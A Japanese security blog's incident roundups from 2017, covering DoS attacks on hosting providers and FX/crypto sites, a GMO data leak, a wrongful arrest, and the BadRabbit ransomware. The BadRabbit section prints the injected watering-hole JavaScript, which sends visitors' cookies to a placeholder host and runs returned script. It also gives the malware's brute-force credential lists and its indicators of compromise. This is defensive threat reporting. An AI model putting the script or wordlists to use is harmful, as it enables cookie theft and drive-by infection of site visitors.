「*[インシデントまとめ]」の検索結果を表示しています
2017-11-11 03:35

2017年10月、11月の国内レンタルサーバー事業者へのDoS攻撃についてまとめてみた

2017年10月半ばから断続的に国内の複数のレンタルサーバー事業者がDoS攻撃を受けており、サーバーに接続できないなどのサービス障害が発生しています。DoS攻撃による障害は11月も継続して報告されています。ここでは関連情報をまとめます。

DoS攻撃の被害を訴える記事多数

10月20日頃から11月以降もDoS攻撃を受けてブログにアクセスができなかった等と報告する記事を44件確認した。(piyokango調べ)

ブログで報告されている主なレンタルサーバー事業者は次の通り。

同時期に次の事業者でDoS攻撃による障害報告も確認した。

レンタルサーバー事業者のDoS攻撃報告

先ほどの事業者で10月から11月にかけてDoS攻撃によるサービス障害の報告をまとめると次の通り。(11月11日時点)

f:id:Kango:20171111023301p:image

参考までに1年を通して障害状況が確認できた事業者で2017年DoS攻撃の報告件数を確認したところ次の通りとなった。

事業者10月20日以降の報告件数2017年に報告された件数
XSEVER43件68件
さくらインターネット25件51件
GMOクラウド7件10件
LOLIPOP!3件9件
StarServer2件10件

DoS攻撃批判記事対策の一環ではないかとの推測がある

DoS攻撃を用いたGoogleの検索表示への対策は次の手順を踏むものとみられる。

この方法が用いられたとみられる報告が上がっている。

DoS攻撃の影響を訴えるブログ

piyokangoが確認したDoS攻撃やその影響を報告している記事は次の通り。

更新履歴

2017-11-01 02:37

サイトM&Aの情報漏えいについてまとめてみた

2017年10月30日、GMOインターネットは同社のサイト売買仲介サービス「サイトM&A」において、登録された会員情報等がインターネット上に流出していたことを発表しました。ここでは関連情報をまとめます。

インシデントタイムライン

日時出来事
2017年5月17日以前今回情報流出した会員情報の対象期間。
2017年8月30日 16時52分掲示板にインターネット上に置かれたZIPファイルのハイパーリンク(公開先A)が投稿される。
〃 17時4分掲示板にZIPファイルがGMOグループ関連の情報ではないかといった内容が投稿される。
2017年9月1日 15時59分掲示板にサイトM&AWebサイトのデータではないかといった投稿がされる。
あわせて公開されていたデータを別の場所(公開先B)にアップしたと投稿される。
2017年9月14日GMOインターネットへ情報漏えいの疑念があるとの外部からの連絡を受領。調査を開始。
2017年9月15日GMOインターネットが流出の事実を確認。インシデント対応を開始。
2017年9月19日GMOインターネット警視庁渋谷署に被害相談。
2017年9月27日システム再構築、安全面の確認作業完了。サイトM&Aを再開。
2017年10月26日GMOインターネットが郵送、及びメールで対象者へ報告。
2017年10月30日 10時59分Twitter上でGMOからの謝罪を郵送で受領したと画像付きで投稿される。*1
マスコミ各社がGMOから情報漏えいがあったと報道
〃 19時14分掲示板に別の場所(公開先C)にアップしたと投稿される。
GMOインターネットがサイトM&Aから情報漏えいがあったことをWebサイトで発表。
2017年11月1日3時22分掲示板に別の場所(公開先D)にアップしたと投稿される。
〃 9時40分掲示板に流出した情報がAmazonKindle Storeに出版されていると投稿される。
〃 13時頃GMOインターネットAmazon上での流出情報販売を把握。*2
〃 14時頃Amazonから販売されていた流出情報が削除される。*3
〃 (時間不明)GMOインターネットがサイトM&Aのサイトに情報漏えいがあったことを掲載。(10月30日発表と同じ)
2017年11月2日 2時25分掲示板に別の場所(公開先E)へのアップを示す内容が投稿される。

公式発表

被害の状況

流出した情報項目
流出対象外に係る情報

次に該当する場合は流出の対象に含まれない。

金銭情報や悪用に係る情報

インシデントの公表が遅れた理由

原因

GMOインターネットによる事故後の対応

今後取り組む施策

更新履歴

*1https://twitter.com/merlionsplash/status/924818112448364544

*2GMOから流出した個人情報、Amazon「Kindle」で電子書籍として販売 悪質な二次利用か,ねとらぼ,2017年11月2日アクセス

*3GMOインターネットから漏えいの個人情報、Amazonの電子書籍として販売される,ITpro,2017年11月1日アクセス

2017-10-25 17:58

ランサムウェアBadRabbitに関する情報についてまとめてみた

2017年10月24日夜(日本時間)からウクライナやロシアを中心にランサムウェア「BadRabbit」に感染し、被害を受けたとの情報が出回っています。ここではBadRabbitに関連する情報についてまとめます。

タイムライン

日時出来事
2016年9月8日一連のキャンペーンに関連するとみられる通信先でRiskIQにより最初に観測された日。
2017年2月頃FireEyeが攻撃にも利用されたJavaScriptフレームワークを観測。*1
2017年10月6日アイカ工業のサーバー不正アクセスを受ける。
〃 17時2分アイカ工業のWebサイトが改ざんされる。
2017年10月9日アイカ工業のサーバー不正アクセスを受ける。
2017年10月24日 17時頃BadRabbitの拡散が始まる。
〃 21時26分InterfaxがTwitterを通じてWebサイト障害が発生していると報告。*2
〃 23時37分この日時までアイカ工業のWebサイトがされていた。
〃 24時頃BadRabbitの拡散を行っていたWebサイトが停止する。
ウクライナのCERT-UAがさらなる攻撃の可能性があるとして注意喚起。*3
US-CERTがBadRabbitによる感染報告を複数受けているとして情報公開。*4
2017年10月25日 1時ウクライナ保安庁が同国内で確認されたインシデントに対する情報提供、及び注意喚起。*5
海外のセキュリティソフト会社よりアイカ工業のWebサイトサイバー攻撃悪用の疑いがあると情報発信。*6
〃 12時17分アイカ工業は同社Webサイトを一時閉鎖。
2017年10月26日 8時45分アイカ工業はWebサイトへ攻撃の疑いがあると発表。
〃 15時30分アイカ工業はWebサイトが一時的に改ざんされた痕跡を確認と発表。
〃 17時頃IPAがBadRabbitに対して注意喚起。*7
〃 22時20分Cisco(Talos)がBadRabbitの拡散機能にEternalRomanceが利用されていると指摘。
2017年11月2日 19時10分アイカ工業が続報としてWebサイトが改ざんされていた可能性がある期間を発表。
2017年11月20日 9時アイカ工業がWebサイトを再開。最終報を発表。

被害状況

BadRabbitの影響を受けたとみられる具体名が出ている組織
組織名被害・影響の概要
インタファクス通信ロシアWebサイトなどの一部のサービスに障害発生。
フォンタンカ出版ロシアサーバーが攻撃を受け障害発生。*8
オデッサ国際空港ウクライナ職員が旅客データを手入力による対応に変更となった。
これを受け当該空港を利用する数便に遅れが生じた。
キエフ地下鉄ウクライナ決済システムで障害が発生した。列車運行への影響はなかった。
セキュリティ組織の把握状況
セキュリティ組織把握している被害状況
NCSCBadRabbitの影響を受けた報告は一切受けていない。*9
IPA多くの機関において業務に支障が出るなどの深刻な影響が発生している。
ESET被害の半分以上はロシアで発生。
観測された割合はロシア65%、ウクライナ12.2%、ブルガリア10.2%、トルコ6.4%、日本3.8%、その他2.4%
KasperskyKSNの統計では全体として約200の端末で攻撃を確認。
大半はロシア。この他にウクライナ、トルコ、ドイツ等でも確認している。
TrendMicroSPNの統計では日本国内での検出は確認されていない。
改ざんされたサイトはデンマーク、アイルランド、トルコ、ロシアで確認。
25日17時半時点でロシア110台、カザフスタン3台、ウクライナ1台の計114台をブロックした。
Symantec感染試行の検出の大半はロシアで最初に現れてから2時間後に発生。
感染試行の国別の検出状況はロシア86%、日本3%、ブルガリア2%、ウクライナ1%、アメリカ1%、その他7%
Avast15か国のユーザーでBadRabbitを検出
それぞれの検出率はロシアが71%、ウクライナ14%、ブルガリア8%。
ポーランド、US、ルーマニアなどでも検出しているが1%以下。
日本国内の状況

ランサムウェア「BadRabbit」について

感染デモ動画
BadRabbitと呼ばれる由来

感染経路(1):改ざんされたサイトの閲覧による感染
感染経路(2):BadRabbitの拡散機能による感染

認証試行に用いられるユーザーID文字列

Administrator,Admin,Guest,User,User1,user-1Test,root,buh,boss,ftp,rdp,rdpuser,rdpadmin,manager,

support,work,other user,operator,backup,asus,ftpuser,ftpadmin,nas,nasuser,nasadmin,superuser,netguest,alex

認証試行に用いられるパスワード文字列

Administrator,administrator,Guest,guest,User,user,Admin,adminTest,test,root,123,1234,12345,123456,1234567,

12345678,123456789,1234567890,Administrator123,administrator123,Guest123,guest123,User123,user123,Admin123,

admin123Test123,test123,password,111111,55555,77777,777,qwe,qwe123,qwe321,qwer,qwert,qwerty,qwerty123,zxc,

zxc123,zxc321,zxcv,uiop,123321,321,love,secret,sex,god

BadRabbitの暗号化機能

暗号化される対象の拡張子

.3ds .7z .accdb .ai .asm .asp .aspx .avhd .back .bak .bmp .brw .c .cab .cc .cer .cfg .conf .cpp .crt .cs .ctl .cxx .dbf .der .dib .disk .djvu .doc .docx .dwg .eml .fdb .gz .h .hdd .hpp .hxx .iso .java .jfif .jpe .jpeg .jpg .js .kdbx .key .mail .mdb .msg .nrg .odc .odf .odg .odi .odm .odp .ods .odt .ora .ost .ova .ovf .p12 .p7b .p7c .pdf .pem .pfx .php .pmf .png .ppt .pptx .ps1 .pst .pvi .py .pyc .pyw .qcow .qcow2 .rar .rb .rtf .scm .sln .sql .tar .tib .tif .tiff .vb .vbox .vbs .vcb .vdi .vfd .vhd .vhdx .vmc .vmdk .vmsd .vmtm .vmx .vsdx .vsv .work .xls .xlsx .xml .xvd .zip

組み込まれたRSA-2048の公開鍵

MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5clDuVFr5sQxZ+feQlVvZcEK0k4uCSF5SkOkF9A3tR6O/xAt89/PVhowvu2TfBTRsnBs83hcFH8hjG2V5F5DxXFoSxpTqVsR4lOm5KB2S8ap4TinG/GN/SVNBFwllpRhV/vRWNmKgKIdROvkHxyALuJyUuCZlIoaJ5tB0YkATEHEyRsLcntZYsdwH1P+NmXiNg2MH5lZ9bEOk7YTMfwVKNqtHaX0LJOyAkx4NR0DPOFLDQONW9OOhZSkRx3V7PC3Q29HHhyiKVCPJsOW1l1mNtwL7KX+7kfNe0CefByEWfSBt1tbkvjdeP2xBnPjb3GE1GA/oGcGjrXc6wV8WKsfYQIDAQAB

この他に実装されている機能など

ジョブ名などに登場する文字列

ジョブ名等の文字列Game Of Thronesでの役割ジョブの動き
rhaegalRhaegar Targaryen王子にちなんで名づけられた。3匹のドラゴンの1つ。dispci.exeとdrogon.jobを実行する。
dorogonKhal Drogoにちなんで名づけられた。3匹のドラゴンの1つ。PCをシャットダウンし、暗号化を実行。身代金文書を表示する。
viserion
(viserion_)
Night Kingが殺されワイトとして復活したドラゴン。3匹のドラゴンの1つ。2度目の再起動時に実行。スクリーンロックし、身代金要求画面を表示。
GrayWormKasperskyによれば登場人物との紹介されているが、同名の人物は存在しないとみられる。
似た名前として同作に登場する司令官Grey Wormが存在する。
BadRabbitのキルスイッチ

c:\windows\infpub.dat

C:\Windows\cscc.dat

過去観測されたランサムウェアとの関連性分析

コメント元対象のランサムウェア関連の有無見解
Group-IBNotPetya肯定NotPetyaを修正したものと解析している。
ESETPetya肯定Petya(Penza)の変種と解析している。
KasperskyNotPetya肯定コードの一部の一致、ドメインのリストが同一、拡散方法が類似等から背後にいる関係者は同じとの見方。
IntezerLabsNotPetya否定?同社リサーチャーはコードの類似率は13%であると分析。*18
PwCNotPetya肯定同社脅威アナリストはNotPetyaとBadRabbitの表層的な差異分析をした結果、両者に密接な関連がみられる*19
BitdefenderGoldenEye/NotPetya肯定構造的に、そしてより広い焦点からも極めて似ている。
Cisco(Talos)NotPetya(Nyetya)肯定BadRabbitとNyetyaのコアコードは同じベース上に構築されている。
両マルウェアのビルドツールチェーンは非常に似ている。
絶対的なつながりを示す証拠はないが両マルウェアの作成者は同じであるといった確信を持っている。
@Adam_CyberNotPetya肯定DLLを共有かつ67%が同一のコードベースである。
これら攻撃は同じスレットアクターが背後にいる可能性。*20

改ざんされた恐れのあるサイト一覧にアイカ工業のドメイン名が含まれる

経緯
改ざんの状況

BadRabbit関連情報(IOC情報)

ファイル
ファイル名機能Sha256
install_flash_player.exe
FlashUtil.exe
ドロッパー630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da
infpub.datdispci.exeの起動タスクを作成。
RSA暗号を利用して対象ファイルを暗号化。
579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648
141d45d650580ed4b0d0fc4b8fd5448da67b30afbe07781da02c39d345a8f4a0
dispci.exe別のブートローダーをインストール。
マシンを起動不可とする。
8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93
cscc.dat32ビット版のDiskCryptor用ドライバ682ADCB55FE4649F7B22505A54A9DBC454B4090FC2BB84AF7DB5B0908F3B7806
64ビット版のDiskCryptor用ドライバ0b2f863f4119dc88a22cc97c0a136c88a0127cb026751303b045f7322a8972f6
Mimikatz32ビット版のmimikatz 亜種2f8c54f9fa8e47596a3beff0031f85360e56840c77f71c6a573ace6f46412035
64ビット版のmimikatz 亜種301b905eb98d8d6bb559c04bbda26628a942b2c4107c07a02e8f753bdcfe347c
BadRabbit関連の通信先
種別通信先
埋め込まれていた通信先(1)185.149.120[.]3
埋め込まれていた通信先(2)172.97.69[.]79 (dfkiueswbgfreiwfsd[.]tk)
埋め込まれていた通信先(3)91.236.116[.]50
埋め込まれていた通信先(4)38.84.134[.]15
ドロッパー配布元1dnscontrol[.]com/flash_install.php (5[.]61[.]37[.]209)
ペイメント先caforssztxqzf2nm[.]onion
同じキャンペーンで利用の恐れがある通信先(ESET)webcheck01[.]net
webdefense1[.]net
secure-check[.]host
firewebmail[.]com
secureinbox[.]email
secure-dns1[.]net
改ざんされていた恐れのあるWebサイト

aica[.]co[.]jp

www[.]dermavieskin[.]com

grupovo[.]bg

www[.]fitnes-trener[.]com[.]ua

www[.]afaceri-poligrafice[.]ro

grandua[.]ua

i24[.]com[.]ua

scanstockphoto[.]com

izgodni[.]bg

www[.]biotechusa[.]ru

www[.]mediaport[.]ua

www[.]armoniacenter[.]com

sweet-home[.]dn[.]ua

www[.]chnu[.]edu[.]ua

fitnes-trener[.]com[.]ua

www[.]t[.]ks[.]ua

www[.]fastfwd[.]ru

www[.]uscc[.]ua

bitte[.]net[.]ua

www[.]fitnes-trener[.]com[.]ua

ophthalmolog[.]kiev[.]ua

grandua[.]ua

i24[.]com[.]ua

akvadom[.]kiev[.]ua

ulianarudich[.]com[.]ua

football[.]zp[.]ua

www[.]mediaport[.]ua

chnu[.]edu[.]ua

evroremont[.]kharkov[.]ua

thecovershop[.]pl

www[.]tofisa[.]com

cream-dream[.]com[.]ua

go2odessa[.]ru

bahmut[.]com[.]ua

abantyoreselurunler[.]com

aldingareefretreat[.]com

ftp9[.]net

magicofis[.]com

piiz[.]tk

tedizmir[.]k12[.]tr

websgramly[.]com

www[.]andronova[.]net

www[.]detaymaxinet[.]com

www[.]fikracenneti[.]com

www[.]gulenturizm[.]com[.]tr

www[.]ilgihastanesi[.]com

www[.]komedibahane[.]com

www[.]moonlightcinemaclub[.]com

www[.]musterihizmetlerinumarasi[.]com

www[.]techkafa[.]net

www[.]teknolojihaber[.]net

www[.]vertizontal[.]ro

izgodni[.]bg

montenegro-today[.]com

scanstockphoto[.]com

www[.]grupovo[.]bg

www[.]matasedita[.]sk

www[.]montenegro-today[.]com

www[.]myk104[.]com

www[.]nadupanyfanusik[.]sk

www[.]otbrana[.]com

www[.]sinematurk[.]com

www[.]ucarsoft[.]com

ペイメント先 Bitcoin ウォレット (公開されているもの)
キャンペーンに利用されたJavaScript
var REMOTE_URL = ‘<INJECTION HOST URL>’;
var C_TIMEOUT = 20000;
function analyze_traffic() {
   return {
       ‘Tr.Referer’: document.referrer,
       ‘Tr.Agent’: navigator.userAgent,
       ‘Tr.CookieState’: !!document.cookie,
       ‘Tr.Cookie’: document.cookie,
       ‘Tr.Domen’: window.location.hostname
   };
}

function execute_request(post, url, callback) {
   var xhr = init_xhr();
   if (!!xhr) {
       xhr.open(‘POST’, url);
       xhr.timeout = C_TIMEOUT;
       xhr.setRequestHeader(‘Content-Type’, ‘application/x-www-form-urlencoded’);
       xhr.onreadystatechange = function () {
           if (xhr.readyState == 4 && xhr.status == 200) {
               callback(xhr.responseText);
           }
       };
       var content = build_query(post);
       xhr.send(content);
   }
}

function apply_payload(response) {
   if (response) {
       var json_result = JSON.parse(response);
       if (json_result) {
           var inject_string = urldecode(json_result.InjectionString);
           if (json_result.InjectionType === 1) {
               window.location = inject_string;
           } else {
               write_on_page(inject_string);
           }
       }
   }
}

function write_on_page(content) {
   var div = document.createElement(‘div’);
   div.id = ‘response’;
   div.innerHTML = content;
   document.body.appendChild(div);
   var scripts = div.getElementsByTagName(‘script’);
   if (scripts.length > 0) {
       for (var i = 0; i < scripts.length; i++) {
           var script = document.createElement(‘script’);
           script.innerHTML = scripts[i].innerHTML;
           document.body.appendChild(script);
           scripts[i].parentNode.removeChild(scripts[i]);
       }
   }
}

function build_query(post) {
   var post_query = [];
   for (var k in post) {
       if (post.hasOwnProperty(k)) {
           post_query.push(k + ‘=’ + post[k]);
       }
   }
   return post_query.join(‘&’);
}

function init_xhr() {
   if (!!window.XMLHttpRequest) {
       return new XMLHttpRequest();
   } else if (!!window.ActiveXObject) {
       var xhr_array = [
           ‘Msxml2.XMLHTTP.6.0’,
           ‘Msxml2.XMLHTTP.3.0’,
           ‘Msxml2.XMLHTTP’,
           ‘Microsoft.XMLHTTP’
       ];
       for (var i = 0; i < xhr_array.length; i++) {
           try {
               return new ActiveXObject(xhr_array[i]);
           }
           catch (e) {
           }
       }
   }
}

function urldecode(data) {
   return decodeURIComponent(data).replace(/\+/g, ‘%20’);
}

// Execute request
var traffic = analyze_traffic();
execute_request(traffic, REMOTE_URL, apply_payload);

参考情報(報道、解析、まとめ等)

全国紙・ブロック紙
報道日付新聞社記事名
2017年10月25日朝刊日本経済新聞地下鉄や空港にサイバー攻撃
2017年10月25日夕刊毎日新聞大規模サイバー攻撃 身代金ウイルス 日露欧に被害 (共同)
2017年10月25日夕刊東京新聞ロシアや日本などに大規模サイバー攻撃 身代金ウイルス感染 (共同)
2017年10月26日朝刊産経新聞日本や露にサイバー攻撃 ウクライナ 空港・地下鉄被害
セキュリティ組織
その他

更新履歴

*1国内でも「Bad Rabbit」を観測 - 2月には誘導スクリプトが稼働か,Security NEXT,2017年10月25日アクセス

*2https://twitter.com/interfax_news/status/922799045088829442

*3Кібератака 24.10.2017

*4Multiple Ransomware Infections Reported

*5СБУ блокувала подальше розповсюдження комп’ютерного вірусу

*6アイカ工業にサイバー攻撃 サイト停止、不正改ざんの疑い,共同通信,2017年10月26日アクセス

*7https://twitter.com/IPAjp/status/923464685340340224

*8:Вирус-шифровальщик атаковал российские СМИ,Ведомости,2017年10月26日アクセス

*9Bad Rabbit: Game of Thrones-referencing ransomware hits Europe,thegurdian,2017年10月26日アクセス

*10ロシアなど複数国でサイバー攻撃、大きな障害なし,TBS,2017年10月25日アクセス

*11ロシアなどに新たなサイバー攻撃、日本でも被害,Reuters,2017年10月25日アクセス

*12https://twitter.com/bartblaze/status/922866774693044224

*13https://twitter.com/MaartenVDantzig/status/922854232176422912

*14https://twitter.com/LukasStefanko/status/922916146856189952

*15https://twitter.com/fwosar/status/922866144549228545

*16https://twitter.com/0xAmit/status/922871446602502145

*17https://twitter.com/0xAmit/status/922872657116368897

*18https://twitter.com/jaytezer/status/922875751174758400

*19個人ブログにて指摘

*20https://twitter.com/Adam_Cyber/status/922930877109362694

*21アイカ工業がWebサイトを一時閉鎖、Bad Rabbitが原因か,ITpro,2017年10月26日アクセス

*22不正アクセス アイカ工業サイトに改ざんの痕跡 HP停止,毎日新聞,2017年10月27日アクセス

*23アイカ工業、サイバー攻撃の疑いで閉鎖中だったWebサイトを再開,ITPro,2017年11月21日アクセス

2017-09-19 01:20

仮想通貨取引所やFXサイトへのDoS攻撃についてまとめてみた

2017年9月14日頃から国内の仮想通貨やFXを取り扱う複数のサイトでDDoS攻撃と見られる大量のアクセスを受けたことによる障害が発生したと発表しています。これら確認されているDoS攻撃が同一の攻撃元かどうかは不明です。

ここでは関連情報をまとめます。

No区分障害発生元障害発生日時復旧日時原因リリース等
1FXマネーパートナーズ9月14日9時10分頃9月14日13時10分DDoS攻撃【続報3】当社取引システム並びにホームページにおける動作確認のお知らせ
当社取引システム並びにホームページにおける動作確認のお知らせ
9月14・15日に発生したサイバー攻撃について
2FXDMM9月15日7時24分9月15日8時40分−(記載無し)ログインがしづらい事象について
【続報・復旧】ログインがしづらい事象について
3仮想通貨テックビューロ9月15日9時頃9月15日19時40分頃DDoS攻撃本日発生したアクセスしにくい現象に関するご報告
4FXFXトレード・フィナンシャル9月16日9時53分9月19日12時見込DDoS攻撃当社システムに対するDDoS攻撃について
5仮想通貨みんなのビットコイン9月18日8時頃9月18日21時頃DDoS攻撃ユーザーと見られるTweetその1Tweetその2
6FXヒロセ通商(1回目)9月18日10時15分9月18日11時28分DDoS攻撃本日発生しました障害について
7FXJFX9月18日10時15分9月18日11時28分DDoS攻撃本日発生しました障害について
8FXヒロセ通商(2回目)9月19日9時54分9月19日17時57分DDoS攻撃当社ホームページへのアクセスについて
9仮想通貨ビットフライヤー(1回目)9月20日17時46分9月20日22時50分(報道)DDoS攻撃Twitterでの報告
10FXデューカスコピー・ジャパン9月21日4時00分9月21日5時44分DDoS攻撃9月20日以降に発生したサイバー攻撃について
11FXコムテックス9月21日8時前9月22日0時頃決済代行業者へのDDoS攻撃Twitterでの報告
12FX外為どっとコム9月21日9時15分9月21日10時00分DDoS攻撃の可能性トップページ掲載(魚拓)
Twitterでの報告
13FX東洋証券9月21日9月21日10時00分DDoS攻撃ネット入金サービス障害のお知らせ
ネット入金サービス障害【復旧】のお知らせ
14FX上田ハーロー9月21日10時15分頃−(発表無し)DDoS攻撃の可能性9月21日、22日の弊社ホームページアクセス状況につきまして
15FXインヴァスト証券9月21日8時頃9月21日9時30分頃決済代行業者へのDDoS攻撃Myページおよび即時入金の復旧のお知らせ
16仮想通貨BTCボックス9月21日18時頃9月21日18時20分−(発表無し)9月21日 アクセス状況について
17FXデューカスコピー・ジャパン9月21日18時15分9月21日18時30分DDoS攻撃9月20日以降に発生したサイバー攻撃について
18FXデューカスコピー・ジャパン9月21日18時50分9月21日18時59分DDoS攻撃9月20日以降に発生したサイバー攻撃について
19FXデューカスコピー・ジャパン9月21日21時08分9月22日2時45分DDoS攻撃9月20日以降に発生したサイバー攻撃について
20FXインヴァスト証券9月22日8時40分頃9月22日9時20分頃決済代行業者へのDDoS攻撃Myページ復旧のお知らせ
【重要】Myページおよび即時入金サービス障害のご報告(続報)
21FXセントラル短資FX(1回目)9月22日9時3分9月22日9時12分DDoS攻撃【重要】DDoS攻撃により当社ウェブサイトにアクセスしづらくなっています
【重要】本日(9月22日)発生したサイバー攻撃について
22FXマネースクウェア・ジャパン9月22日10時6分9月22日12時35分DDoS攻撃【FX】ログイン障害への対応について
23FXセントラル短資FX(2回目)9月22日18時20分9月22日19時00分頃DDoS攻撃【重要】本日(9月22日)発生した2回目のサイバー攻撃について
【重要】DDoS攻撃への対応について
24FXデューカスコピー・ジャパン9月22日21時50分9月22日22時00分DDoS攻撃9月20日以降に発生したサイバー攻撃について
25仮想通貨ビットフライヤー(2回目)9月23日20時25分9月23日20時56分−(記載無し)Twitterでの報告
26アフィリエイトインタースペース9月25日10時4分頃9月25日11時56分頃DDoS攻撃【お詫び】障害発生のご報告と復旧のお知らせ

関連不明な脅迫メールの発生

DDoS攻撃の前に脅迫メールを受信した組織

DDoS攻撃の直前に脅迫メールを受け取っていた組織が複数存在していたことが判明。報道*1 *2で脅迫があったことが明らかにされた組織は次の通り。

脅迫を受けた組織脅迫を受けた時期脅迫の状況など
マネーパートナーズ9月14日9時過ぎ複数のアドレスで送られていた。
24時間以内に2BTCを要求する英文メールであった。
直後にDDoS攻撃が発生した。
15分間攻撃する、24時間以内に支払いがない場合、攻撃を再開するという内容。
24時間のリミット前に再度攻撃が発生した。
FXトレード・フィナンシャル9月16日午前中DDoS攻撃の数分前にマネーパートナーズと同様のメールを受信した。
ヒロセ通商9月18日脅迫メールを受信。
FX取引業者と契約している決済代行業者2017年9月21日8時前Armada Collectiveを名乗り、DDoS攻撃の予告、攻撃の停止と引き換えに金銭を要求するもの。
メール受信直後にDDoS攻撃が発生。
システム会社はドメイン名を変更する措置を取り、攻撃を回避。
Phantom Squadを自称する送信元

JPCERT/CCやSANSが9月19日頃より、「Phantom Squad」を名乗る送信元から脅迫(DoS攻撃の停止と引き換えに金銭を要求)するメールが届いているとの情報が国内で確認されていると報告しています。JPCERT/CCによればこの脅迫メールと今回確認されているDoS攻撃との関連は不明とのこと。

関連Tweet

テックビューロ
FXFT
JFX
ヒロセ通商
ビットフライヤー
外為どっとコム
上田ハーロー
コムテックス
BTCボックス

更新履歴

*1ネット金融狙うDDoS攻撃が続く、脅迫型による被害も明らか,ITpro,2017年9月25日アクセス

*2FX業者にサイバー攻撃、直前に予告し金銭要求,読売新聞,2017年9月25日アクセス

2017-09-11 02:40

徳島県警察の誤認逮捕事件についてまとめてみた

2017年9月10日、チケット売買を巡り、徳島県警察(三好署)により詐欺容疑で女性Aが逮捕、勾留されていた事件について、別人(女子中学生B)によるなりすましの犯行であり、女性Aは誤認逮捕であったと報道されました。ここでは関連情報をまとめます。

インシデントタイムライン

日時出来事
2016年8月頃女性AがTwitter上にチケット売買を書き込み。
2016年8月17日女子中学生BがAになりすましてC、Dと架空の売買契約。
その後徳島県内の女子高生C、Dがチケット代として計8万円を振り込み。
2016年9月チケットが届かなかったとして女子高生Cが被害届を徳島県警察三好署へ提出。
女性A逮捕直前徳島県警察が女性Aの自宅を家宅捜索。
2017年5月15日現金をだまし取ったとして女性Aが詐欺容疑として徳島県警察により逮捕。同月送検。*1
:(19日間)女性Aを勾留。
2017年6月2日徳島地検が女性Aを処分保留で釈放。
2017年6月7日女性Aが徳島地検にチケット送付の証明書を提出。
2017年8月下旬徳島県警察が女子中学生Bの存在を把握。
2017年9月10日徳島県警察が女性Aを誤認逮捕していたと報道
同日 13時半頃徳島県警察 三好署幹部が女性A宅を訪問し謝罪
2017年9月11日徳島県警察が詐欺の疑いとして女子中学生Bを書類送検、及び女性Aの誤認逮捕について発表。
2017年9月27日徳島地検が女性Aへ電話で謝罪
同日徳島地検が女子中学生Bを詐欺の非行事実で徳島家裁送致。*2

事案概要

f:id:Kango:20170911234327p:image:w640

登場人物
愛知県女性A 21歳Bのなりすましによる詐欺容疑で誤って逮捕、送検され19日間勾留された。その後処分保留で釈放。
京都市女子中学生B 15歳チケット売買を通じAのなりすましを行い、現金6万1880円を受領した疑い。A釈放後の捜査により、存在を把握され詐欺容疑で書類送検。
徳島県内の女子高生C 10代Aの投稿を見て購入を希望した一人。AになりすましたBと架空の売買契約を行い、Aの口座へ4万円を振り込みした。その後チケットが届かないとして徳島県警察へ被害相談。
和歌山県内の女性D 10代Aの投稿を見て購入を希望した一人。AになりすましたBと架空の売買契約を行い、Aの口座へ4万円を振り込みした。
関東の女性E 20代Bが売買サイトにA名義で出品したチケットを6万5千円で落札した。

逮捕後の状況(女性Aの勾留)

釈放後の状況(徳島県警察の再捜査)
徳島県警察から女性Aへ謝罪

徳島県警察が女性Aを誤認逮捕した理由

記者会見やその後の取材を通じ、誤認逮捕となった理由について西岡署長らが次の通り回答した。

発表まで時間を要した理由について次の通り回答した。

女性Aが行ったチケットの送付
女性Aの銀行口座
女性AになりすましていたTwitterアカウント

徳島地検が起訴しなかった理由

徳島地検の町田聡次席検事が理由を説明。

また、徳島地検は女子中学生Bの処分が決まり次第、女性Aへの謝罪等の対応について適切に行うとコメントした。

なりすましを行っていた女子中学生B

更新履歴

*1女性を誤認逮捕 その後釈放,NHK,2017年9月11日アクセス

*2チケット転売で誤認逮捕の女性不起訴 徳島地検謝罪,徳島新聞,2017年9月28日アクセス

*3:誤認逮捕発覚を受け、報道各社は実名個所や記事自体の削除を行っている模様。

*4徳島・三好署が誤認逮捕謝罪 19日間勾留された専門学校生宅訪れ,徳島新聞,2017年9月11日アクセス

*5徳島県警が21歳女性を誤認逮捕 ̄9日間勾留 「公演チケット売る」と女性に成り済ました女子中生を書類送検,産経ニュース,2017年9月11日アクセス

*6徳島県警_1歳女性を誤認逮捕…詐欺容疑で19日間勾留,SANSPO.com,2017年9月11日アクセス

*7徳島・三好署が誤認逮捕 詐欺容疑の専門学校生 成り済まし被害,徳島新聞,2017年9月11日アクセス

*8:徳島県警 詐欺誤認逮捕 勾留19日 21歳女性 SNSなりすまされ,読売新聞,2017年9月11日夕刊

*9中3女子、警察をも欺く手の込んだ偽装工作 被害女性はチケット配送記録で潔白証明,産経ニュース,2017年9月11日アクセス

*10チケット詐欺で誤認逮捕=21歳女性を19日間勾留−徳島県警,時事通信,2017年9月11日アクセス

*119月12日付 三好署誤認逮捕  成り済まし見抜くすべは,徳島新聞,2017年9月12日アクセス

*12なりすまし誤認逮捕、「ネット犯罪の知識不足」,読売新聞,2017年9月12日アクセス

*13チケットの送付先を調べず、専門学校生を逮捕,産経ニュース,2017年9月12日アクセス

*14なおざりな捜査が誤認逮捕招く 徳島・チケット詐欺,徳島新聞,2017年9月12日アクセス

Kango
Kango

piyokangoの日記。備忘録。